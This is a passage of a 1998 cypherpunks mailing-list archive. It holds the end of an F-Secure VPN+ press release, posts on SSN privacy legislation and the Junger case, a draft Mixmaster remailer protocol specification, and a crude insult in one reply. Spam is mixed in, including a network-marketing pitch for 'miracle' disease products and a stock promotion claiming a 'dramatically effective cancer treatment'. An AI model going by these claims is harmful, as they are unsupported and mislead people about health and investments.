Local Area Network (LAN) through a Wide Area Network (WAN) using the IPsec
protocol to other LANs, and to workstations equipped with encryption software.
The Enterprise version allows simultaneous connections from both VPN+
Clients and VPN+ Gateway devices.  
   
 "What is revolutionary about F-Secure VPN+ is that a virtual
private network can now be built cost-effectively between just two
workstations," says Mr. Teemu Lehtonen, Product Manager for Data Fellows.
"This is great news for small and medium sized organizations. Large
organizations can also utilize F-Secure VPN+ to extend their corporate network
to sites outside the corporate domain." 

F-Secure VPN+ integrates fully with the recently-introduced Data Fellows'
F-Secure FileCrypto and F-Secure Anti-Virus products. Together, these
products offer the most complete security solution for modern corporations.
The products support centralized policy based management.

F-Secure VPN+ is available from Data Fellows' resellers around the world.
The products have been tested for interoperability with almost 20 other
vendors' (including Cisco Systems, IBM and Check Point) IPsec-standardized
products.

About Data Fellows

Data Fellows is one of the world's leading developers of data security
software. The company's groundbreaking F-Secure products provide a unique
combination of globally available strong encryption and revolutionary
anti-virus software. The integrated F-Secure software family provides
complete security solutions for enterprises of any size. It includes file
encryption and IPsec communication encryption products, VPN gateways,
SSH-based secure remote management software, easy-to-use solutions for
distributed DNS management, and a full range of anti-virus products for
workstations, servers and gateways. Data Fellows is also the developer of
the award-winning F-PROT Professional anti-virus engine, which is now an
integral part of the multiple engine structure of F-Secure Anti-Virus.   

Data Fellows has offices in San Jose, California, and Helsinki, Finland. In
addition, it offers a worldwide network of technical support, training and
distribution in over 80 countries. 

Since the company was founded in 1988, its annual net sales growth has
consistently been over 80%. Data Fellows belongs to an elite group of
companies with a triple-A rating from Dun&Bradstreet. The company is
privately owned.  

For further information, please contact:

USA:
Data Fellows Inc.
Mr. Pirkka Palomaki, Product Manager
Tel. +1 408 938 6700 
Fax  +1 408 938 6701
E-mail:  Pirkka.Palomaki@DataFellows.com

Finland:
Data Fellows Ltd.
Mr. Teemu Lehtonen, Product Manager 					
Tel.  +358 9 859 900
Fax. +358 9 8599 0599
E-mail: Teemu.Lehtonen@DataFellows.com

or visit our web site at http://www.DataFellows.com


Mia.Westerholm@DataFellows.com 
http://www.DataFellows.com

Data Fellows Ltd.
PL 24
FIN-02231 ESPOO, FINLAND
Tel. +358 9 859 900
Fax. +358 9 8599 0599




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 10 Jul 1998 21:13:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: no subject!
In-Reply-To: <199807070635.IAA08822@basement.replay.com>
Message-ID: <3.0.5.32.19980710170837.008f0990@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:35 AM 7/7/98 +0200, Anonymous wrote:
>Where is this?  Stalled.  Looks dead in the water.  Any further insights?

Dr. Ron Paul often introduces good bills that will never get anywhere,
because he's _not_ a mainstream Congressscritter.
He was a conservative Republican Congresscritter from Houston, 
quit the GOP in ~1986/1987, ran for President as a Libertarian, (lost),
and a couple of years ago decided to re-emerge as a Republican.

He's generally in favor of personal and economic freedom,
though he seems to believe that the US government owns the country
and therefore has the right to ban immigrants; I took the Ron Paul
bumper sticker off my car a few years after the election when he
endorsed Pat Buchanan for the Republican nomination instead of
the also-bad George Bush.  He's also rabidly against the U.N.,
and borders on Black-Helicopter paranoia on occasion :-)

He's willing to take a strong stand against the Republicrats 
when there are issues of principle, and therefore doesn't have a 
lot of support - often he and Bernie Sanders, the Vermont Socialist, 
are about the only members opposing a bill.  So no surprise if the bill dies.


>H.R.3261 
>SPONSOR: Rep Paul (introduced 02/25/98) 
>
>SUMMARY: 
>
>(AS INTRODUCED) 
>
>Privacy Protection Act of 1997 (sic) - Amends title II (Old Age, Survivors
>and Disability Insurance) of the Social Security Act and the Internal
>Revenue Code to prohibit any Federal, State, or local government agency or
>instrumentality from using a social security account number or
>any derivative as the means of identifying any individual, except for
>specified social security and tax purposes. 
>
>Amends the Privacy Act of 1974 to prohibit any Federal, State, or local
>government agency or instrumentality from requesting an individual to
>disclose his social security account number on either a mandatory or a
>voluntary basis. 
>
>Prohibits any two Federal agencies or instrumentalities from implementing
>the same identifying number with respect to any individual, except as
>authorized under this Act. 
>
>
>----
>STATUS: Detailed Legislative Status 
>
>                                                 House Actions
>
>Feb 25, 98:
>     Referred to the Committee on Ways and Means, and in addition to the
>Committee on Government Reform and Oversight, for a period to
>     be subsequently determined by the Speaker, in each case for
>consideration of such provisions as fall within the jurisdiction of the
>     committee concerned. 
>     Mar 2, 98:
>          Referred to the Subcommittee on Government Management,
>Information and Technology.
>Feb 25, 98:
>     Referred to the Committee on Ways and Means, and in addition to the
>Committee on Government Reform and Oversight, for a period to
>     be subsequently determined by the Speaker, in each case for
>consideration of such provisions as fall within the jurisdiction of the
>     committee concerned.
>
>
>
>
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 10 Jul 1998 21:14:19 -0700 (PDT)
To: Hua@teralogic-inc.com>
Subject: RE: Junger et al.
In-Reply-To: <413AC08141DBD011A58000A0C924A6D52C359A@mvs2.teralogic-inc.com>
Message-ID: <3.0.5.32.19980710171121.008f33f0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:11 AM 7/7/98 -0400, mgraffam@mhv.net wrote:
>On Mon, 6 Jul 1998, Ernest Hua wrote:
>> Did anyone demonstrate the "functionalness" of any arbitrary language
>> via a scanner and a compiler?
>Indeed.. what we need is for someone to testify to the court about
>natural and computer language, and maybe some relevent material from
>information theory. 
>
>Pseudo-code from any computer programming textbook would be helpful
>in making this point too.
>
>What about English in a voice recognition system? In this case, English
>can actually perform functions too, just as C does.

A particularly relevent language is the Algorithmic Language, Algol,
which was designed for mathematicians to describe algorithms to each other,
though it was also designed in a way to support compilers,
such as ALGOL-60.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Fri, 10 Jul 1998 13:53:51 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Tit 'n' Run/Man sues self/World's worst liar
Message-ID: <19980710190741.21988.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

CLICK FOR STUFFED: Friday July 10 1998

<img src=http://stuffed.net/98/7/10/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/10/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Fri, 10 Jul 1998 12:58:54 -0700 (PDT)
To: Declan McCullagh <cypherpunks@toad.com>
Subject: Re: FC: Possessing fake IDs soon to be a federal crime (& Y2K)
In-Reply-To: <Pine.GSO.3.95.980710081527.28173B-100000@well.com>
Message-ID: <Pine.BSF.3.96.980710195243.3526B-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Jul 1998, Declan McCullagh wrote:

>   Remember when your underage friend ginned up that fake driver's
>   license to go bar-hopping? Soon it may be a federal crime, punishable
>   by serious fines and up to 15 years in the slammer. The Senate
>   Judiciary Committee yesterday unanimously approved the "Identity Theft
>   and Assumption Deterrence Act," a clunkily named bill that bans
>   obtaining, possessing or using ID "other than that issued lawfully for
>   the use of the possessor."
>   [...remainder snipped...]
>
    oh, shit. does that mean I will be forced to tell everyone my real
    name is FUD?  or TruthMonger? or, even HugeCajones? at least it's
    not DV_KOTM!

    speaking of the late, lamentable foul mouth... whatever happened to
    dmitri?

	attila out...    while I can still be outing attila.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@cit.nepean.uws.edu.au>
Date: Fri, 10 Jul 1998 04:48:20 -0700 (PDT)
To: attila <attila@hun.org>
Subject: Re: FC: Forget Internet restrictions -- how about banning TV?
In-Reply-To: <Pine.BSF.3.96.980709213822.4532E-100000@hun.org>
Message-ID: <Pine.LNX.3.93.980710204202.167A-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 9 Jul 1998, attila wrote:

> On Thu, 9 Jul 1998, Eric Murray wrote:
> > [snip]
> >
> >Then they came for the newspaper, and that really pissed me off, so
> >I wanted to protest.

[...]

>     point duly noted.  however, TV as a degenerative (self eating 
>     watermelon) force is an option --which I took by refusing it
>     the privilege of its one eyed stare.

However you have the right to choose not to watch TV, and we have the
right to watch TV.  Its not weather TV is good or bad, but do we have the
ablity to make that decistion on our own.  Indeed if I wish to do
something that is degenerative and self-destructive I should be allowed
to.


- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNaXwk6QK0ynCmdStAQFFDQQA0JH1omnj/kAsjG9y8pADYpwSfwXs0CvR
10LvVcplpHz4XECKmnvzkccT8zG1qBpyDAHH5QFfpwbO6RG0Ig5E9JvEFHMY5aLG
z0WYq3hEATH07ivaVADTa+H/9dI0k9nJxFc8i1jFDNpDm8JR8o3aF7tSP0F/uja1
3osAe406fNY=
=ZBGz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Fri, 10 Jul 1998 11:52:51 -0700 (PDT)
To: Jerry <cypherpunks@toad.com
Subject: Re: no subject
In-Reply-To: <199807092321.XAA23250@steve1.weboneinc.com>
Message-ID: <3.0.5.32.19980710205216.0089ed30@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 09 07 98 GMT, Jerry wrote:
--snip--<gag)

Thank you so very much, Jerry.
Now fuck off and die.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remove00012@usa.net
Date: Fri, 10 Jul 1998 20:59:51 -0700 (PDT)
To: remove00012@usa.net
Subject: Spend Extra Time With Your Family.
Message-ID: <94691665_60884038>
MIME-Version: 1.0
Content-Type: text/plain



Dear Prospective Entrepreneur;
 
I have been an attorney for 26 years, but recently I
joined a company which is only 3 years old, and is 
growing at a fantastic rate; in fact, after only 10 
months old, it was featured in SUCCESS MAGAZINE, and
it has been the #1 rated network marketing opportunity
for the last three years.

What makes this company and this opportunity I am 
offering you so great, is the fact that we (Marketing
Executives) have "EXCLUSIVE" marketing rights in the 
United States to new miracle products that are
providing dramatic benefits to people who have two of
the worst diseases known to mankind.  Americans who
learn about and need our products, can only get
them through us, and not from other companies, or the
corner drug store.

After getting into other companies in the last several
years, and going from company to company, and product
to product (mostly companies that failed, or had falsely
advertised products), I finally found this company that 
is truly "CREDIBLE," has tremendous products, a great
compensation plan, and, best of all, my customers are
calling me back month after month.

Since the products actually sell themselves, I'm NOT
constantly on the phone, or forever hustling all my
relatives and friends. Products that make people feel
better (especially natural products that have no side
effects, and do have a 60 day money back guarantee)
cause people to call me every month, instead of me 
calling them.

Our "exclusive" and "patented" all natural products
have also gone through the double blind clinical 
studies and have produced unbelievable sales in foreign
markets, and have only recently been introduced into
the United States, so our timing is also perfect.

If you are interested in trying our products and/or
looking at this business opportunity, call me toll-free
at 888-203-6668 and leave your name, telephone number,
and/or your address if you want more information. You 
also can respond to this e-mail if you so wish.

If you are ready to make some changes in your life, free
up some time to spend with your family, and make some
extra money, call me or e-mail me.  WHAT HAVE YOU GOT TO
LOSE?  I made that same call a few months ago, and I 
promise, you will be happy to hear more about this tre-
mendous company, its great products, and about how easy 
it will be for you to make that extra money.

Thanks, 
Clyde Fontenot


This message is brought to you from Clyde Fontenot, 
Attorney, 504 W. Main St., Ville Platte,LA.70586,
318-363-5535. If you would like to be removed from
future e-mails, please "reply" with the word 
REMOVE in the subject of your reply message.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@REPLAY.COM
Date: Fri, 10 Jul 1998 13:26:22 -0700 (PDT)
To: mix-l@jpunix.com
Subject: Mixmaster protocol
Message-ID: <199807102025.WAA06967@basement.replay.com>
MIME-Version: 1.0
Content-Type: text


I'd like to get feedback on the clarity of this draft describing the
Mixmaster protocol.

I'll post the proposed extensions for version 3 later.



Mixmaster Protocol
==================

Abstract

Most e-mail security protocols only protect the message body, leaving
useful information such as the the identities of the conversing
parties, sizes of messages and frequency of message exchange open to
adversaries. This document describes Mixmaster, a mail transfer
protocol designed to protect electronic mail against traffic analysis.


Table of Contents

1. Introduction
2. The Mix-Net Protocol
   2.1 Message Creation
   2.2 Remailing
3. Message Format
   3.1 Cryptographic Algorithms
   3.2 Packet Format
   3.2.1 Header Chart Format
   3.2.2 Body Format
   3.3 Mail Transfer Encoding
   3.5 Transfer through Socket Connections
4. Key Format
5. References


1. Introduction

This document describes a mail transfer protocol designed to protect
electronic mail against traffic analysis. Most e-mail security
protocols only protect the message body, leaving useful information
such as the the identities of the conversing parties, sizes of
messages and frequency of message exchange open to adversaries.

Message transmission can be protected against traffic analysis by the
mix-net protocol. A mix (remailer) is a service that forwards
messages, using public key cryptography to hide the correlation
between its inputs and outputs. If a message is sent through a
sequence of mixes, one trusted mix is sufficient to provide anonymity
and unobserveability of communications against a powerful
adversary. Mixmaster is a mix-net implementation for electronic mail.

This document describes version 2 of the Mixmaster message format.


2. The Mix-Net Protocol

The mix-net protocol [Chaum] allows to send messages while hiding the
relation of sender and recipient from observers (unobserveability). It
also provides the sender of a message with the ability to remain
anonymous to the recipient (sender anonymity). If anonymity is not
desired, authenticity and unobserveability can be achieved in the same
time by transmitting digitally signed messages.

This section gives an overview over the protocol used in
Mixmaster. The message format is specified in section 3.


2.1 Message Creation

To send a message, the user agent splits into parts of fixed size,
which form the bodies of Mixmaster packets. If sender anonymity is
desired, care should be taken not to include identifying information
in the message. The message may be compressed.

The sender choses a sequence of up to 20 remailers for each
packet. The final remailer must be identical for all parts of the
message.

The packet header consists of 20 charts. For a sequence of n
remailers, header charts n+1, ... , 20 are filled with random
data. For all charts i := n down to 1, the sender generates a
symmetric encryption key, which is used to encrypt the body and all
following header charts. This key, together with other control
information for the remailer, is included in the i-th header chart,
which is then encrypted with the remailer's public key.

The message is sent to the first remailer in an appropriate transport
encoding.

To increase reliability, multiple copies of message may be sent
through different paths. The final remailer must be identical for all
paths, so that duplicates can be detected and the message is delivered
only once.


2.2 Remailing

When a remailer receives a message, it decrypts the first header chart
with its private key. By keeping track of a packet ID, the remailer
verifies that the packet has not been processed before. The integrity
of the message is verified by checking the packet length and verifying
message digests included in the packet. Then the first header chart is
removed, the others are shifted up by one, and the last chart is
filled with random padding. All header charts and the message body are
decrypted with the symmetric key found in the header. This reveals a
public key-encrypted header chart for the next remailer at the top,
and obscures the old top header chart. Transfer encoding is applied to
the resulting message.

The remailer collects several encrypted messages before sending the
resulting messages in random order. Thus the relation between the
incoming and outgoing messages is obscured to outside adversaries even
if the adversary can observe all messages sent. The message is
effectively anonymized by sending it through a chain of independently
operated remailers.


2.3 Message Reassembly

When a packet is sent to the final remailer, it contains a flag
indicating that the chain ends at that remailer, and whether the
packet contains a complete message or part of a multi-part message. If
the packet contains the entire message, the body is decrypted and
after reordering messages the plain text is delivered to the
recipient. For partial messages, a packet ID is used to identify the
other parts as they arrive. When all parts have arrived, the message
is reassembled and delivered. If the parts do not arrive within a time
limit, the message is discarded.

Only the last remailer in the chain can determine whether packets are
part of a certain message. To all the others, they are completely
independent.

If necessary, the reassembled message is decompressed before sending
it to the recipient.

When anonymous messages are forwarded to third parties, the final
remailer should ensure that the sender cannot supply header lines that
indicate a false identity or send Usenet control messages that may
have security implications. Appropriate information about the origin
of the message should be inserted in the Comments: header line of the
message.

If the recipient does not wish to receive anonymous messages, the
remailer can ensure authenticity be verifying that the message is
cryptographically signed [RFC 1991, RFC 2311] by a known sender.


3. Message Format

3.1 Cryptographic Algorithms

The asymmetric encryption operation in Mixmaster version 2 uses RSA
with 1024 bit RSA keys and PKCS #1 padding [RFC 2313]. The symmetric
encryption uses EDE 3DES with cipher block chaining (24 byte key, 8
byte initialization vector) [Schneier]. MD5 [RFC 1321] is used as the
message digest algorithm.


3.2 Packet Format

A Mixmaster packet consists of a header containing information for the
remailers, and a body containing the payload. To ensure that packets
are undistinguishable, the size of these encrypted data fields is
fixed.

The packet header consists of 20 header charts (specified in section
A.2) of 512 bytes each, resulting in a total size of 10240 bytes. The
header charts and the body are encrypted with symmetric session keys
specified in the first header chart.


3.2.1 Header Chart Format

     Public key ID                [  16 bytes]
     Encrypted session key length [   1 byte ]
     RSA-encrypted session key    [ 128 bytes]
     Initialization vector        [   8 bytes]
     Encrypted header section     [ 328 bytes]
     Padding                      [  31 bytes]

Total size:
  512 bytes

A random 24 bit Triple-DES key is encrypted with RSA, resulting
in 1024 bit of encrypted data.

The header section encrypted with this session key is:

     Packet ID                     [ 16 bytes]
     Triple-DES key                [ 24 bytes]
     Packet type identifier        [  1 byte ]
     Packet type 0:
        19 Initialization vectors  [152 bytes]
        Remailer address           [ 80 bytes]
     Packet type 1:
        Message ID                 [ 16 bytes]
        Initialization vector      [  8 bytes]
     Packet type 2:
        Packet number              [  1 byte ]
        Number of packets          [  1 byte ]
        Message ID                 [ 16 bytes]
        Initialization vector      [  8 bytes]
     Timestamp                     [  7 bytes] (optional)
     Message digest                [ 16 bytes]

Total size:
  Type 0: 297 bytes (+ 7 if timestamp is used)
  Type 1:  81 bytes (+ 7 if timestamp is used)
  Type 2:  83 bytes (+ 7 if timestamp is used)

This data structure is padded to 328 bytes.

Packet ID: randomly generated packet identifier.

Key: symmetric key used to encrypt the following header charts and the
body.

Packet type identifier:

Intermediate hop           0
Final hop                  1
Final hop, partial message 2

Initialization vectors: For packet type 1 and 2, the IV is used to
symmetrically encrypt the body. For packet type 0, there is one IV for
each of the 19 following header charts. The IV for 19th header chart
is also used for the body.

Remailer address: address of next hop.

Message ID: randomly generated identifier unique to (all packets of)
this message.

Packet number: Sequence number used in multi-packet messages.

Number of packets: Total number of packets.

Timestamp: A timestamp is introduced with the byte sequence (48, 48,
48, 48, 0). The following two bytes specify the number of days since
Jan 1, 1970, given in little-endian byte order. A random number of up
to 3 may be substracted from the number of days in order to obscure
the origin of the message.

Digest: MD5 digest computed over the preceding elements of the
encrypted header section.

Header charts 2 .. 20 and the body each are decrypted separately using
the respective initialization vectors.


3.2.2 Body Format

     Number of destinations     [        1 byte]
     Destination addresses      [ 80 bytes each]
     Number of header lines     [        1 byte]
     Header lines               [ 80 bytes each]
     Payload                    [      any size]

Destination addresses are Internet mail addresses. Additionally,
the following special destinations are defined:

null:             Dummy message, will be discarded by the final mix.
post: newsgroup   Message will be posted to Usenet.

The payload may be compressed using GZIP [RFC 1952] if the
capabilities attribute of the final remailer contains the flag
"C". When compressing the message, the operating system field must be
set to Unix, and file names must not be given. The remailer treats
messages beginning with the GZIP identification header (31, 139) as
compressed.

The resulting message is split into chunks of 10236 bytes. To each chunk,
its length is prepended as a 4 byte little-endian number to form the body
of a Mixmaster packet.


3.3 Mail Transfer Encoding

Mixmaster packets are sent as text messages [RFC 822]. The body has
the following format:

  ::
  Remailer-Type: Mixmaster [version number]
  
  -----BEGIN REMAILER MESSAGE-----
  [message length]
  [message digest]
  [encoded message]
  -----END REMAILER MESSAGE-----

The length field always contains the decimal number "20480", since the
size of Mixmaster messages is constant. The MD5 message digest [RFC
1321] of the message is encoded as a hexadecimal string.

The message itself is encoded in base 64 encoding [RFC 1421] and
broken into lines of 40 characters.


4. Key Format

Remailer public key files consist of a list of attributes and a
public RSA key:

  [attributes list]
  
  -----Begin Mix Key-----
  [key ID]
  [length]
  [encoded key]
  -----End Mix Key-----

The attributes are listed in one line separated by spaces:

identifier:   a human readable alphabetical string identifiying the remailer
address:      the remailer's Internet mail address
key ID:       public key ID
version:      the Mixmaster version number
capabilities: flags indicating additional capabilites of the remailers

The identifier consists of alphanumeric characters, begining with an
alphabetic character. It must not contain whitespace.

The encoded key packet consists of two bytes specfying the key length
(1024 bits) in little-endian byte order, and of the RSA modulus and
the public exponent in big-endian form using 128 bytes each, with
preceding null bytes where necessary. The packet is encoded in base
64, and broken into lines of 40 characters each. Its length (258
bytes) is given as a decimal number.

The key ID is the MD5 message digest of the reprentation of the RSA
public key (not including the length bytes). It is encoded as a
hexadecimal string.

The capabilities field is optional. Clients should ignore unknown flags.
The following flags are used in version 2.0.4:

C     accepts compressed messages.
M     will forward messages to another mix, when used as the final hop.
Nm    supports posting to Usenet throught a mail-to-news gateway.
Np    supports direct posting to Usenet.

Digital signatures [RFC 1991] should be used to ensure the
authenticity of the key files.


5. References

[Chaum] Chaum, D., "Untraceable Electronic Mail, Return Addresses, and
Digital Pseudonyms", Communications of the ACM 24 (1981) 2.

[RFC 822] Crocker, D., "Standard for the Format of ARPA Internet Text
Messages", STD 11, RFC 822, August 1982.

[RFC 1321] Rivest, R., "The MD5 Message-Digest Algorithm", RFC 1321,
April 1992.

[RFC 1421] Linn, J., "Privacy Enhancement for Internet Electronic
Mail: Part I -- Message Encryption and Authentication Procedures", RFC
1421, February 1993.

[RFC 1952] Deutsch, P., "GZIP file format specification version 4.3",
RFC 1951, May 1996.

[RFC 1991] Atkins, D., Stallings, W. and Zimmermann, P., "PGP Message
Exchange Formats", RFC 1991, August 1996.

[RFC 2311] Dusse, S., Hoffman, P, Ramsdell, B, Lundblade, L. and
Repka, L., "S/MIME Version 2 Message Specification", RFC 2311, March
1998.

[RFC 2313] Kaliski, B., "PKCS #1: RSA Encryption, Version 1.5", RFC
2313, March 1998.

[Schneier] Schneier, B., "Applied Cryptography", 2nd Edition, Wiley,
1996.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <mminow@yahoo.com>
Date: Fri, 10 Jul 1998 23:58:04 -0700 (PDT)
To: Hua@teralogic-inc.com>
Subject: RE: Junger et al.
Message-ID: <19980711065637.27355.rocketmail@send1a.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


My declaration for the Junger lawsuit (available on jya.com) touched
on these issues, but the court chose not to accept my reasoning. My
quick reading of the decision is that the court took note that sourc
and object code are functional (they control a computer), and chose
to ignore their ability to express an algorithm and, hence, to
communicate
the substance of an encryption algorithm to another human being.

The court also appears to assume that, because computer source code
requires
technical skill and training understand, it somehow loses its First
Amendment privileges: this I find confusing.

Martin Minow (minow@pobox.com)

---Bill Stewart  wrote:
>
> At 03:11 AM 7/7/98 -0400, mgraffam@mhv.net wrote:
> >On Mon, 6 Jul 1998, Ernest Hua wrote:
> >> Did anyone demonstrate the "functionalness" of any arbitrary
language
> >> via a scanner and a compiler?
> >Indeed.. what we need is for someone to testify to the court about
> >natural and computer language, and maybe some relevent material from
> >information theory. 
> >
> >Pseudo-code from any computer programming textbook would be helpful
> >in making this point too.
> >
> >What about English in a voice recognition system? In this case,
English
> >can actually perform functions too, just as C does.
> 
> A particularly relevent language is the Algorithmic Language, Algol,
> which was designed for mathematicians to describe algorithms to each
other,
> though it was also designed in a way to support compilers,
> such as ALGOL-60.
> 				Thanks! 
> 					Bill
> Bill Stewart, bill.stewart@pobox.com
> PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639
> 
> 

==
Please reply to minow@pobox.com


_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tne1870@hotmail.com
Date: Sat, 11 Jul 1998 11:20:15 -0700 (PDT)
Subject: Pre-Press Pre-owned Equipment
Message-ID: <eaep.3.0.reg.JohEGQ.35987.471212963@mail.pe.net>
MIME-Version: 1.0
Content-Type: text/plain



INFORMATION ONLY

The Pre-Press Brokerage Company brokers used pre-press 
equipment for the newspaper industry.

Our web address:     http://www.pe.net/~pbc
Our email address:    pbc@pe.net

You may call our office at 909.686.2875.
Thank you for your consideration.

Geoff McPartlin
Sales Director





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrsd3424@hotmail.com
Date: Sat, 11 Jul 1998 12:09:19 -0700 (PDT)
To: jrs3453@hotmail.com
Subject: News Release....
Message-ID: <9807091526.AA15333@pharmdec.wustl.edu>
MIME-Version: 1.0
Content-Type: text/plain


NEWS RELEASE

NuOncology Labs Inc

Symbol: NLAB
Trades:  OTC BB

July 9, l998

NUONCOLOGY LABS COMPLETES ACQUISITION

Virginia Beach, VA - NuOncology Labs, Inc.
(OTC BB: NLAB), a Florida Corporation, announced
today that it has acquired all the outstanding and 
issued shares of NuOncology Labs, Inc. (Nulab),
a private Virginia Corporation.  The new combined
entity will maintain the name NuOncology Labs Inc.

NuOncology Labs, Inc's Senior Medical Director is
R. Michael Williams, Ph.D, the co-founder, Senior
Medical Director and Chief Medical Officer of Cancer
Treatment Centers of America.  The company's 
Scientific Director is Fraser S. Baker, Ph. D., co-
founder and Director of Baker-Sanger Laboratory,
Inc., a Houston based chemosensitivity testing
laboratory.

NuOncology Labs, Inc. participates in the multi-
billion dollar cancer treatment industry by supporting
the research and marketing of a promising cancer
treatment along with the delivery of predictive tests
for the optimization of contemporary cancer 
treatment.  Both activities could greatly improve
clinical outcomes while reducing treatment costs.



NuOncology Labs Inc has a "dramatically effective 
cancer treatment" in trials with over 200 patients
at this time.  This project as well as NuOncology
Labs Inc is being lead by a "very distinguished
research and management team".

To receive a complete investor package on 
NuOncology Labs Inc, as well as a FREE 
subscription to our newsletter that profiles
specially selected companies in the "New
Economy" we feel have the potential for
tremendous growth potential PLEASE CLICK
HERE:

Free Info

Please note that by sending an e-mail to this
address you are requesting additional information
on NuOncology Labs Inc as well as a FREE
no obligation subscription to our newsletter.
You may unsubscribe at any time.

We profile these companies at the time they
initially go public - before they have been
discovered by 'the Street' and financial media
and already doubled or tripled in price.





end.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tne1870@hotmail.com
Date: Sat, 11 Jul 1998 11:39:28 -0700 (PDT)
Subject: Pre-Press Pre-owned Equipment
Message-ID: <eaep.3.0.reg.JohEGQ.35987.4856341435@mail.pe.net>
MIME-Version: 1.0
Content-Type: text/plain



INFORMATION ONLY

The Pre-Press Brokerage Company brokers used pre-press 
equipment for the newspaper industry.

Our web address:     http://www.pe.net/~pbc
Our email address:    pbc@pe.net

You may call our office at 909.686.2875.
Thank you for your consideration.

Geoff McPartlin
Sales Director





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tne1870@hotmail.com
Date: Sat, 11 Jul 1998 12:02:58 -0700 (PDT)
Subject: Pre-Press Pre-owned Equipment
Message-ID: <eaep.3.0.reg.JohEGQ.35987.5016413194@mail.pe.net>
MIME-Version: 1.0
Content-Type: text/plain



INFORMATION ONLY

The Pre-Press Brokerage Company brokers used pre-press 
equipment for the newspaper industry.

Our web address:     http://www.pe.net/~pbc
Our email address:    pbc@pe.net

You may call our office at 909.686.2875.
Thank you for your consideration.

Geoff McPartlin
Sales Director





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tne1870@hotmail.com
Date: Sat, 11 Jul 1998 12:25:06 -0700 (PDT)
Subject: Pre-Press Pre-owned Equipment
Message-ID: <eaep.3.0.reg.JohEGQ.35987.5168177083@mail.pe.net>
MIME-Version: 1.0
Content-Type: text/plain



INFORMATION ONLY

The Pre-Press Brokerage Company brokers used pre-press 
equipment for the newspaper industry.

Our web address:     http://www.pe.net/~pbc
Our email address:    pbc@pe.net

You may call our office at 909.686.2875.
Thank you for your consideration.

Geoff McPartlin
Sales Director





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tne1870@hotmail.com
Date: Sat, 11 Jul 1998 12:49:45 -0700 (PDT)
Subject: Pre-Press Pre-owned Equipment
Message-ID: <eaep.3.0.reg.JohEGQ.35987.533969213@mail.pe.net>
MIME-Version: 1.0
Content-Type: text/plain



INFORMATION ONLY

The Pre-Press Brokerage Company brokers used pre-press 
equipment for the newspaper industry.

Our web address:     http://www.pe.net/~pbc
Our email address:    pbc@pe.net

You may call our office at 909.686.2875.
Thank you for your consideration.

Geoff McPartlin
Sales Director





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tne1870@hotmail.com
Date: Sat, 11 Jul 1998 13:10:17 -0700 (PDT)
Subject: Pre-Press Pre-owned Equipment
Message-ID: <eaep.3.0.reg.JohEGQ.35987.5488212963@mail.pe.net>
MIME-Version: 1.0
Content-Type: text/plain



INFORMATION ONLY

The Pre-Press Brokerage Company brokers used pre-press 
equipment for the newspaper industry.

Our web address:     http://www.pe.net/~pbc
Our email address:    pbc@pe.net

You may call our office at 909.686.2875.
Thank you for your consideration.

Geoff McPartlin
Sales Director





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sat, 11 Jul 1998 08:49:40 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: My date with a dwarf/Nice guys come first
Message-ID: <19980711145448.24797.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

CLICK FOR STUFFED: Saturday July 11 1998

<img src=http://stuffed.net/98/7/11/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/11/



